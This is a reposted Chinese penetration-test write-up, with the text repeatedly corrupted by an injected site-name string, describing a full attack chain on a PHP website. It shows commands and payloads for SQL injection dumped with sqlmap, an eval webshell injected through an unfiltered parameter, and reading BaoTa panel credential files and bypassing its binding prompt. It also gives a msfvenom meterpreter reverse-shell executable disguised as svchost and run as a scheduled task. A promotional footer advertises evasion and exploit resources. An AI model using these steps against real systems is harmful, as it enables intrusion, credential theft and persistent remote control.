php初级入门教程
免责声明本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任只供对已授权的目标使用测试,对未授权目标的测资源网试作者不承担责任,均由使用本人自行承担。
文章正文0x1 获取源码首先先常规扫一波目录:dirsearch -u http://x.x.x.x:80/ -e php并没有发现有源码压缩包,故放弃这个思路资源网,重新审视文章,获取关键字,去github进行搜索,成功找到部分源码,然后开始进行审计。
Github:
0x2 进入后台通过之前的扫描,可以获取到后台登陆地址。
访问可以看到登陆页面。
没有验证么,果断上一资源网波常规的弱口令FUZZ,无果。那么只能通过源码进行突破了, 首先观察网站的后台鉴权逻辑主要是通过包含common/login_check.php进行判断。
["login_pwd"]);unset($_资源网SESSION["quanxian"]);echo"alert(login!!pass);";exit;}else{include_once
("../../include/mysqlio.php");资源网那么最直接的思路,就是找到一个没有包含这个文件的地方find ./ -name "*.php" |xargs grep -L "login_check.php"。
找到文件Get_Odds_1.php,资源网 发现其中的$type参数直接拼接进SQL语句中,存在注入。
正常情况:
输入单引号,出错:
SQLMAP 跑出账号密码,,这里虽然是GET类型的SQL注入,但是直接使用sqlmap的-u参数是不行的,需要资源网使用Burp抓包,保存数据包然后用-r参数 sqlmap -r sql.txt -D dsncly -T sys_admin --dump。
0x3 GetShell进入后台,先尝试黑盒,看看有没有上传资源网功能,不过似乎没有找到可用的上传点。
黑盒没找到很明显的办法了,只能进行快速代码审计了,直接全局搜索危险函数eval,file_put_contens、fwrite、fputs等。
可以看到这里写入的文件资源网是php文件,且内容可以通过ta_msg参数进行控制,也没有过滤,只有简单的去除两边的空格,这里务必要自己本地进行构造下,避免出现闭合失败的错误构造payload:);eval($_POST[a]);资源网var_dump(md5(1));//;。
最终写入到文件gp_db.php
成功GetShell
0x4 宝塔提权通过phpinfo,可以看到disable_function,同时通过nmap扫描端口,可资源网知目标存在宝塔。不过幸运的是,shell的权限还是蛮高的,可以浏览到宝塔的目录。
获取宝塔密码:D:/BtSoft1/panel/data/default.pl开放端口:D:/BtSoft1/panel资源网/data/port.pl后台地址:D:/BtSoft1/panel/data/admin_path.pl
获取账号:D:/BtSoft1/panel/data/default.db通过上面步骤获取到的资源网账号和密码,登陆到后台http://xxxx:8888/Tajl2eP0/
登陆进去之后会弹出强制绑定窗口,可以通过直接访问/site来绕过这个。下面有两种思路进行提权:1) 通过软件管理->已安装,删资源网除禁用函数,来实现命令执行。
2) 通过宝塔自带的计划任务MSF生成木马msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai资源网 -i 5 LHOST=x.x.x.x LPORT=10001 EXTENSIONS=stdapi,priv -f exe > svchOst.exe。
放到C盘即可,然后添加shell计划任务
ipco资源网nfig /all 查看网络状态
简单查看下arp -a和扫描下内网网段的存活情况,并没有连通,故没有继续后续的内网渗透测试0x5 总结本文的渗透过程比较常规,涵盖了从0到1的完整单目标渗透过程,核心在资源网于快速的代码审计能力,由于这个系统开发比较凌乱,所以故不能采用框架的方式去阅读,故采用危险函数定位是一种有效的方法,最后通过利用宝塔的信息,成功获取到最高的权限,完成渗透测试的目标。
本文转自https资源网://forum.butian.net/people/2968,如有侵权,请联系删除。
技术交流知识星球致力于红蓝对抗,实战攻防,星球不定时更新内外网攻防渗透技巧,以及最新学习研究成果等常态化更新最新安资源网全动态专题更新奇技淫巧小Tips及实战案例涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。
星球中已发布 200+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具资源网、POC&EXP以及各种学习笔记等等
交流群关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。
关注我们关注福利:回复“app" 获取 app渗透和app抓包资源网教程回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库回复“书籍" 获取 网络安全相关经典书籍电子版pdf。
回复“资料" 获取 网络安全、渗透测试相关资源网资料文档往期文章我是如何摸鱼到红队的命令执行漏洞[无]回显[不]出网利用技巧MSSQL提权全总结Powershell 免杀过 defender 火绒,附自动化工具
一篇文章带你学会容器逃逸域渗透 | k资源网erberos认证及过程中产生的攻击通过DCERPC和ntlmssp获取Windows远程主机信息
亲爱的读者们,感谢您花时间阅读本文。如果您对本文有任何疑问或建议,请随时联系我。我非常乐意与您交流。
发表评论:
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。